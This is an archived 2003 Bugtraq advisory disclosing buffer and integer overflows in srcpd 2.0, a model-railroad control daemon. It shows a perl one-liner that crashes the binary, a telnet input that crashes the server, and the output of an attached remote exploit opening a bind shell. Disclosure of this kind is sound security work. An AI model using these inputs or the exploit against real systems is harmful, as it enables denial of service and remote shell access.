[m00 SA001]: Buffer overflows in srcpd

From: Over_G (overg_at_mail.ru)
Date: 08/21/03

  • Next message: Carl-Daniel Hailfinger: "[Advisory] SECURITY BUG in BitKeeper" 
    Date: Thu, 21 Aug 2003 16:08:46 +0400
To: bugtraq@securityfocus.com

    /***********************************************
    *
    * m00 security advistory #001
    *
    * Buffer overflows in Srcpd v2.0
    *
    * www.m00security.org
    *
    * overg[at]mail.ru h0snp[at]mail.ru
    *
    ************************************************/

    ---------------------------------------
    Product: srcpd
    Version: 2.0 (other ?)
    OffSite: http://srcpd.sourceforge.net
    Problem: buffer & integer overflows.
    ---------------------------------------

    Vulnerability file:
    /usr/sbin/srcpd

    Description the package:

    The srcpd is a server daemon that enables
    you to control and play with a digital model
    railroad using any SRCP Client. Actually
    it supports an Intellibox (tm), a Marklin
    Interface 6050 or 6051 (tm?), and many more
    interfaces. More information about SRCP and
    links to many really cool clients (and other
    servers for different hardware) can be found
    at http://srcpd.sourceforge.net and
    http://www.der-moba.de/Digital
    This is a beta release, do not use for production!

    SRCP - Simple Railroad Command Protocol.

    1. Local buffer overflow.

    In File srcpd.c length 'conffile' = MAXPATHLEN.
    If 'conffile' > MAXPATHLEN then srcpd is 'crashed'.

    [over@localhost m00]$ /usr/sbin/srcpd -f `perl -e 'print "A" x 10000'`

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread 1024 (LWP 1197)]
    0x420d2a44 in _getopt_internal () from /lib/i686/libc.so.6

    2. Remote integer overflow.

    [over@localhost m00]$ telnet localhost 12340
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    srcpd V2; SRCP 0.8.2
    go 11111111
    1060333759.411 200 OK GO 1
    go 11111111
    Connection closed by foreign host.

    [over@localhost m00]$ telnet localhost 12340
    Trying 127.0.0.1...
    telnet: connect to address 127.0.0.1: Connection refused

    3. Remote stack overflow/command execution.

    There are multiply stack overflow vulnerabilities in method
    handlers. For example, handleSET() , handleGET() and other.
    Therefore we can smash the stack and get a shell.
    See code for more info...

    Remote exploit attached.

    example:

    [h0snp@h0m3 srcpd]$ ./m00-srcpd -h localhost -t 0
     ** ***************************************** **
     ** Srcpd v2.0 remote exploit by m00 Security **
     ** ***************************************** **
     Conneting...OK
     using RET = 0xbf1fcb61
     now, if you was lucky with ret, shell spawned on 26112.
    [h0snp@h0m3 srcpd]$ telnet localhost 26112
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    id;
    uid=500(h0snp) gid=500(h0snp) groups=500(h0snp)

    (c) m00 Security / Over_G & h0snp

  • Next message: Carl-Daniel Hailfinger: "[Advisory] SECURITY BUG in BitKeeper"